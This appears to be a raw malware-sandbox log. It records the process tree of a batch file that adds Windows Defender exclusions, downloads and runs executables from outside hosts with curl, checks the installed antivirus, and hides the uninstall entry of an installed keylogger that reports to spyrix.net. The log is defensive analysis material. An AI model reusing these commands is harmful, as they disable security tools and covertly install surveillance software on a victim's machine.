Source: qrl.exe	String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe	String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe	String found in binary or memory: --false-start
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
